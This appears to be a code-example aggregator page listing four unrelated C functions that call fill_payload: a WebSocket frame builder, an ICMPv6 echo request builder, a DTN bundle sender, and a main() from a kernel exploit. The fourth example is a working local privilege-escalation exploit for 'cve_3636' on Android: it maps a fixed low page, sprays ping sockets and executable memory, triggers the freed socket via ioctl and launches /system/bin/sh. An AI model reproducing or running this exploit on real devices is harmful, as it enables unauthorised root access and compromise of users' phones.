Пример #1
0
static void prepare_message(uint8_t type, uint8_t *buffer, uint64_t length, bool shall_mask, uint8_t mask[4])
{
	uint8_t *ptr = read_buffer;
	read_buffer_length = 0;
	uint8_t header = 0x00;
	header |= WS_HEADER_FIN;
	header |= type;
	::memcpy(ptr, &header, sizeof(header));
	ptr += sizeof(header);
	read_buffer_length += sizeof(header);

	uint8_t first_length = 0x00;
	if (shall_mask) {
		first_length |= WS_HEADER_MASK;
	}
	if (length < 126) {
		first_length = first_length | (uint8_t)length;
		::memcpy(ptr, &first_length, sizeof(first_length));
		ptr += sizeof(first_length);
		read_buffer_length += sizeof(first_length);
	} else if (length <= 65535) {
		first_length = first_length | 126;
		::memcpy(ptr, &first_length, sizeof(first_length));
		ptr += sizeof(first_length);
		read_buffer_length += sizeof(first_length);
		uint16_t len = (uint16_t)length;
		len = htobe16(len);
		::memcpy(ptr, &len, sizeof(len));
		ptr += sizeof(len);
		read_buffer_length += sizeof(len);
	} else {
		first_length = first_length | 127;
		::memcpy(ptr, &first_length, sizeof(first_length));
		ptr += sizeof(first_length);
		read_buffer_length += sizeof(first_length);
		uint64_t len = htobe64(length);
		::memcpy(ptr, &len, sizeof(length));
		ptr += sizeof(len);
		read_buffer_length += sizeof(len);
	}

	if (shall_mask) {
		::memcpy(ptr, mask, 4);
		ptr += 4;
		read_buffer_length += 4;
	}

	fill_payload(ptr, buffer, length, shall_mask, mask);
	read_buffer_length += length;
}
Пример #2
0
/*
 * Function: create_echo_request()
 *
 * Description:
 *  This function creates icmpv6 echo request
 *
 * Argument:
 *  info_p: pointer to data of icmp structure
 *
 * Return value:
 *  None
 */
void
create_echo_request(struct icmp6_info *info_p)
{
    struct ip6_datagram pkt;		/* ICMPv6 packet */
    struct icmp6_segment *echoreq_p;	/* Echo request header and payload */
    struct pseudo_ip6_datagram pseudo;	/* ICMPv6 pseudo packet for checksum */
    unsigned short int ip6_psize;	/* payload size */

    ip6_psize = sizeof(struct icmp6_hdr)	/* ICMP header */
		    + info_p->data_size;	/* ICMP payload */
    memset(&pkt, '\0', sizeof(struct ip6_datagram));
    echoreq_p = (struct icmp6_segment *)&(pkt.payload);

    /* IPv6 Header */
    pkt.hdr.ip6_vfc	= 6 << 4;
    pkt.hdr.ip6_flow	|= 0;
    pkt.hdr.ip6_plen	= htons(ip6_psize);
    pkt.hdr.ip6_nxt	= IPPROTO_ICMPV6;
    pkt.hdr.ip6_hlim	= IPV6_DEFAULT_HOPLIMIT;
    pkt.hdr.ip6_src	= info_p->saddr;
    pkt.hdr.ip6_dst	= info_p->daddr;

    /* Echo Request Header */
    echoreq_p->hdr.icmp6_type	= ICMP6_ECHO_REQUEST;
    echoreq_p->hdr.icmp6_code	= 0;
    echoreq_p->hdr.icmp6_cksum	= 0;	/* Calculate later */
    echoreq_p->hdr.icmp6_id		= htons(ICMP_ECHO_ID);
    echoreq_p->hdr.icmp6_seq		= htons(1);

    /* Echo Request Payload */
    fill_payload(echoreq_p->data, info_p->data_size);

    /* ICMPv6 Pseudo packet */
    pseudo.hdr.p_ip6_src	= pkt.hdr.ip6_src;
    pseudo.hdr.p_ip6_dst	= pkt.hdr.ip6_dst;
    pseudo.hdr.p_ip6_plen	= htons(ip6_psize);
    pseudo.hdr.p_ip6_zero1	= 0;
    pseudo.hdr.p_ip6_zero2	= 0;
    pseudo.hdr.p_ip6_nxt	= IPPROTO_ICMPV6;
    memcpy(pseudo.payload, echoreq_p, ip6_psize);

    /* Calcualte checksums */
    echoreq_p->hdr.icmp6_cksum = calc_checksum((u_int16_t *)(&pseudo),
				sizeof(struct pseudo_ip6_hdr) + ip6_psize);

    /* Store the clean packet data */
    info_p->pkt = pkt;
    info_p->pkt_size = sizeof(struct ip6_hdr) + ip6_psize;
}
Пример #3
0
void
to_bundles()
{

    int bytes, ret;
    dtn_reg_info_t reg_report; /* for reports, if reqd */
    dtn_reg_info_t reg_session; /* for session reg, if reqd */
	
    // initialize bundle spec
    memset(&bundle_spec, 0, sizeof(bundle_spec));
    parse_eid(handle, &bundle_spec.dest, arg_dest);
    parse_eid(handle, &bundle_spec.source, arg_source);

    if (arg_replyto == NULL) {
        dtn_copy_eid(&bundle_spec.replyto, &bundle_spec.source);
    } else {
        parse_eid(handle, &bundle_spec.replyto, arg_replyto);
    }

    if (verbose) {
        print_eid(info, "source_eid", &bundle_spec.source);
        print_eid(info, "replyto_eid", &bundle_spec.replyto);
        print_eid(info, "dest_eid", &bundle_spec.dest);
    }

    if (wait_for_report) {
	// if we're given a regid, bind to it, otherwise make a
	// registration for incoming reports
        if (regid != DTN_REGID_NONE) {
            if (dtn_bind(handle, regid) != DTN_SUCCESS) {
                fprintf(stderr, "%s: error in bind (id=0x%x): %d (%s)\n",
                        progname, regid, ret, dtn_strerror(dtn_errno(handle)));
                exit(EXIT_FAILURE);
            }
        } else {
            memset(&reg_report, 0, sizeof(reg_report));
            dtn_copy_eid(&reg_report.endpoint, &bundle_spec.replyto);
            reg_report.flags = DTN_REG_DEFER;
            reg_report.expiration = REG_EXPIRE;
            make_registration(&reg_report);
        }
    }

    if (session_flags) {
        // make a publisher registration 
        memset(&reg_session, 0, sizeof(reg_session));
	dtn_copy_eid(&reg_session.endpoint, &bundle_spec.dest);
        reg_session.flags = DTN_SESSION_PUBLISH;
        reg_session.expiration = 0;
	make_registration(&reg_session);
    }
    
    // set the dtn options
    bundle_spec.expiration = expiration;
    
    if (delivery_receipts) {
        // set the delivery receipt option
        bundle_spec.dopts |= DOPTS_DELIVERY_RCPT;
    }

    if (forwarding_receipts) {
        // set the forward receipt option
        bundle_spec.dopts |= DOPTS_FORWARD_RCPT;
    }

    if (custody) {
        // request custody transfer
        bundle_spec.dopts |= DOPTS_CUSTODY;
    }

    if (custody_receipts) {
        // request custody transfer
        bundle_spec.dopts |= DOPTS_CUSTODY_RCPT;
    }

    if (receive_receipts) {
        // request receive receipt
        bundle_spec.dopts |= DOPTS_RECEIVE_RCPT;
    }

    if (sequence_id) {
        bundle_spec.sequence_id.data.data_val = sequence_id;
        bundle_spec.sequence_id.data.data_len = strlen(sequence_id);
    }

    if (obsoletes_id) {
        bundle_spec.obsoletes_id.data.data_val = obsoletes_id;
        bundle_spec.obsoletes_id.data.data_len = strlen(obsoletes_id);
    }

    if ((bytes = fill_payload(&primary_payload)) < 0) {
	fprintf(stderr, "%s: error reading bundle data\n",
	    progname);
	exit(EXIT_FAILURE);
    }

    memset(&bundle_id, 0, sizeof(bundle_id));
    if ((ret = dtn_send(handle, regid, &bundle_spec, &primary_payload,
                        &bundle_id)) != 0) {
	fprintf(stderr, "%s: error sending bundle: %d (%s)\n",
	    progname, ret, dtn_strerror(dtn_errno(handle)));
	exit(EXIT_FAILURE);
    }

    if (verbose)
        fprintf(info, "Read %d bytes from stdin and wrote to bundles\n",
		bytes);

    if (wait_for_report) {
	memset(&reply_spec, 0, sizeof(reply_spec));
	memset(&reply_payload, 0, sizeof(reply_payload));
	
	// now we block waiting for any replies
	if ((ret = dtn_recv(handle, &reply_spec,
			    DTN_PAYLOAD_MEM, &reply_payload, -1)) < 0) {
	    fprintf(stderr, "%s: error getting reply: %d (%s)\n",
		    progname, ret, dtn_strerror(dtn_errno(handle)));
	    exit(EXIT_FAILURE);
	}
	if (gettimeofday(&end, NULL) < 0) {
	    fprintf(stderr, "%s: gettimeofday(end) returned error %s\n",
		    progname, strerror(errno));
	    exit(EXIT_FAILURE);
	}
    
	if (verbose)
	    fprintf(info, "got %d byte report from [%s]: time=%.1f ms\n",
	       reply_payload.buf.buf_len,
	       reply_spec.source.uri,
	       ((double)(end.tv_sec - start.tv_sec) * 1000.0 + 
		(double)(end.tv_usec - start.tv_usec)/1000.0));
    }
}
Пример #4
0
int main()
{
	int *socks;
	unsigned long *address[MAX_MMAP];
	int pid[MAX_CHILD];
	int pipe_read[MAX_CHILD];

	void *addr;
	int max_fds;
	int i, num_socks, num_child;
	int j;
	int success, count;
	int fd;
	int vulnerable = 0;
	int child_socks, total_child_socks;
	int temp;
	unsigned long *target;


	addr = mmap((void*)0x200000, _PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (addr == MAP_FAILED) {
		printf("map failed!\n");
		return -1;
	}
	memset((void*)0x200000, 0, _PAGE_SIZE);

	protect_from_oom_killer();

	fd = create_icmp_socket();
	if (fd < 0) {
		printf("can not crate icmp socket!\n");
		return -1;
	}

	setup_vul_socket(fd);

	for (i = 0; i < _PAGE_SIZE / sizeof(int *); i++) {
		if (((unsigned int*)addr)[i] != 0) {
			vulnerable = 1;
			break;
		}
	}

	if (vulnerable == 0) {
		printf("cve_3636 not vulnerable!\n");
		return -1;
	}

	if (mmap(0x50000000, 0x4000, PROT_WRITE | PROT_READ | PROT_EXEC,
                 MAP_SHARED | MAP_ANONYMOUS | MAP_FIXED, -1, 0) != 0x50000000) {
                printf("map shellcode area failed!\n");
                return -1;
        }

        for (i = 0; i < 0x4000; i += 4){
                target = 0x50000000 + i;
                *target = call_back;
        }

	my_pid = getpid();

	max_fds = maximize_fd_limit();
	printf("max_fds = %d\n", max_fds);
	socks = malloc(sizeof(int*) * (max_fds + 1));

	printf("create child to spray\n");
	num_child = 0;
	num_socks = 0;
	child_socks = 0;
	total_child_socks = 0;
	for (i = 0; i < MAX_CHILD; i++) {

		if (total_child_socks > MAX_SOCKS)
			break;
		
		pid[i] = create_child(&pipe_read[i], max_fds, &child_socks);

		if (pid[i] == -1)
			break;

		printf(".");
		fflush(stdout);
		//printf("create vulnerable socket!\n");
		total_child_socks += child_socks;
		//printf("\n now child sockets = %d\n", total_child_socks);
		if ( num_socks < max_fds) {
			socks[num_socks] = create_icmp_socket();
			if (socks[num_socks] == -1)
				break;
			num_socks++;
		}

		usleep(500000);
	}
	num_child = i;
	printf("total child sockets: %d\n", total_child_socks);
	printf("\nchild num: %d\n", num_child);

	socks[num_socks] = -1;

	printf("vulnerable socket num: %d\n", num_socks);

	printf("now close child socket!\n");
	for (i = 0; i < num_child; i++) {
		close_child(pid[i]);
	}

	printf("setup vulnerable socket!\n");

	for (i = 0; i < num_socks; i++) {

		setup_vul_socket(socks[i]);
	}

	printf("sparying ...\n");
	success = 0;
	while (1) {

		count = 0;
		for (i = 0; i < MAX_MMAP; i++) {
			address[i] = mmap((void*)0, MAP_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
					MAP_SHARED|MAP_ANONYMOUS, -1, 0);
			if (address[i] == MAP_FAILED)
			{
				printf("map failed!\n");
				break;
			}
			fill_payload(address[i], MAP_SIZE);
			for (j = 0; socks[j] != -1; j++) {
				if (get_sk(socks[j]) > 0) {
					success = 1;
					printf("get it!\n");
					ioctl(socks[j], 0x5678, &temp);
					break;
				}
			}
			if (success)
				break;
		}
		count = i;

		if (success) {
			printf("free %ld bytes\n", MAP_SIZE * (count - 1));
			for (i = 0; i < count; i++) {
				munmap(address[i], MAP_SIZE);
			}
			munmap(0x50000000, 0x4000);
			system("/system/bin/sh");

			break;
		}
	}
	
	printf("main end!\n");

	return 0;
}